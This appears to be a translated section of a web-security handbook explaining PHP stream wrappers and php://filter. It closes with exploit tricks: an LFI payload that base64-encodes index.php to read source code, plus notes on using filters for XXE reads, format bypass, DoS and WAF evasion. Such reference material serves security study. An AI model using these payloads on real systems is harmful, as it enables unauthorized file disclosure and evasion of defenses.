5.1.6. PHP Stream¶
5.1.6.1. Introduction¶
The concept of streams (Streams) was introduced in php 4.3. It is an abstraction of streaming data and is used to unify data operations, such as file data, network data, and compressed data.
Streams can be manipulated by functions such as file, open, fwrite, fclose, file_get_contents, file_put_contents, etc.
5.1.6.2. Encapsulation Protocol¶
PHP comes with many built-in URL-style wrappers for filesystem functions like fopen(), copy(), file_exists(), and filesize(). Use stream_get_wrappers() to view the upported protocols.
file://Accessing local filesystemhttp://Accessing HTTP(s) URLsftp://Accessing FTP(s) URLsphp://Accessing various I/O streamszlib://Compression Streamsdata://Data(RFC 2397)glob://Find pathnames matching patternphar://PHP Archivessh2://Secure Shell 2rar://RARogg://Audio streamexpect://Process Interaction Streams
5.1.6.3. Support Streaming¶
PHP provides a number of input/output (IO) streams that allow access to PHP’s input and output streams, standard input and output and error descriptors, in-memory, disk-backed temporary file streams, and filters that can manipulate other read and write file resources .
Note that streams are not restricted by allow_url_fopen , but php://input、 php://stdin、 php://memory and php://temp are restricted by allow_url_include.
5.1.6.3.1. Input and output streams¶
php://stdin 、 php://stdout and php://stderr allow direct access to the corresponding input or output stream of the PHP process. The data stream references the duplicated file descriptor, so if you open php://stdin and then close it, you just close the duplicate, and the actual STDIN that is being referenced is not affected.
where php://stdin read-only, php://stdout and php://stderr are write-only.
5.1.6.3.2. fd¶
php://fd allows direct access to the specified file descriptor. For example php://fd/3 file descriptor 3 is referenced。
5.1.6.3.3. memory and temp¶
The streams php://memory and php://temp are read-write, allowing temporary data to be stored in a file-like wrapper.The difference between the two is that php://memory will always be in memory, whereas php://temp will start writing to a temporary file when the memory limit is reached.
5.1.6.3.4. input¶
php://input is a read-only stream with access to the requested raw data。In the case of POST requests, it is better to use php://input instead $HTTP_RAW_POST_DATA, as it does not depend on specific php.ini directives. Also, such cases $HTTP_RAW_POST_DATA are not populated by default, always_populate_raw_post_data potentially requiring less memory than activating.When set enctype="multipart/form-data" then php://input is invalid.
5.1.6.4. filter¶
php://filter is a meta-wrapper designed for filtering applications when data streams are opened. PHP provides some stream filters by default, in addition to that, various custom filters can be used.
The filter has three parameters: resource, read, and write. The resource parameter is required. It specifies the stream of data you want to filter. read and write are optional parameters, you can set one or more filter names, separated by a pipe character (|).
5.1.6.4.1. Filter List¶
Can use stream_get_filters() to obtain a list of registered filters。The built-in filters in PHP are as follows:
- string filter
string.rot13
string.toupper
string.tolower
string.strip_tags
- conversion filter
convert.base64-encode
convert.base64-decode
convert.quoted-printable-encode
convert.quoted-printable-decode
convert.iconv.*
- compression filter
zlib.deflate
zlib.inflate
bzip2.compress
bzip2.decompress
- encryption filter
mcrypt.``ciphername``
mdecrypt.``ciphername``
5.1.6.4.2. Filter exploit tricks¶
- LFI
php://filter/convert.base64-encode/resource=index.php
When XXE reads the file, it will parse and report an error, which can be encoded by base64
base64 encoding discards characters not in the code table, which can be used to bypass some file formats
Some converts will consume a lot of resources and can be used as DoS
rot13 / convert converted 过WAF